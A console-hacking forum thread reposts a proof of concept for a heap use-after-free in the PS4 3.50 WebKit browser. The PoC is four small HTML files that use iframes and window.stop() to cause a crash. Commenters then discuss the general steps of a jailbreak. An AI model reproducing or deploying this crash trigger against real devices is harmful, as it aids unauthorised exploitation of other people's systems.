Category PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       29,016       49            
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg
 

Comments

sEKTOR

Developer(Team Ze0s)
Developer
Senior Member
Contributor
this method is easy as I said earlier the gap is there. while not one.
 

PLAYER 1

Senior Member
Contributor
So, today... what kind of code could be injected, what kind of homebrews could be created based on this findings ???

I dont know the ps4 system, so please, someone could explain it, ? please.
Thanks.
 

Chaos Kid

Developer
Senior Member
Contributor
i think it is in this direction ->

Find a Vuin -> If found like the Memory error -> Check if the Vuln is exploitable -> If so its a good sign -> Next step use a exploit to the vuln for an entry point -> entry point ok -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have Kernel access but another exploit is needed for gain root or run own code....

Just my thinking it can be wrong maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is ok....^^
This vulnerability is good it does work with a few different ways I have tested so far. No need for code injection and if you stay close with original compiler you can literally crash the system and see the heap on memory and where the loc pointer shod be directed.
Keep in mind I'm not just known for toolchains nor kernels I dig out the info for whats usable and how it can work to come together.
Some information
This is very close to ode rigid body moving objects simulation.
 

Winchest

Senior Member
Contributor
I´m new to here.
Just a simple question.

What the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What does the devs need for a CFW like Rebug for example?
 

mcmrc1

Senior Member
Contributor
Verified
I´m new to here.
Just a simple question.

What the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What does the devs need for a CFW like Rebug for example?
first of all they need keys !!! To decrypt the Firmware change the files and encrypt them again that the PS4 recognize the Firmware as a valid one....

Correct me if iam wrong....
 
Recent Articles
Latest PlayStation 4 Game Trailer Videos from Gamescom 2019
Earlier this week we saw a Call of Duty: Modern Warfare 2v2 Alpha PS4 trailer video from Gamescom 2019, and below is some more fresh PlayStation 4 video game footage from this year's Gamescom...
Chiaki: Free and Open Source PS4 Remote Play Client by Thestr4ng3r!
Last month we reported on a PS4 Remote Play open source client in development by thestr4ng3r, and today he released Chiaki... the first free and open source PS4 Remote Play client software for...
Sony Patent Surfaces on Rumored PlayStation 5 / PS5 Development Kit Design
Although Sony's next-generation PlayStation 5 console isn't expected until the 2020 holiday season, today Andrew Marmo tweeted about a rumored Sony Interactive Entertainment patent...
CoD: Modern Warfare 2v2 Alpha Gamescom 2019 PS4 Trailer and Tips
The public Gamescom 2019 event runs from August 21st through the 24th, and during the weekend of August 23rd through the 25th gamers will be able to play the Call of Duty: Modern Warfare 2v2 Alpha...
Top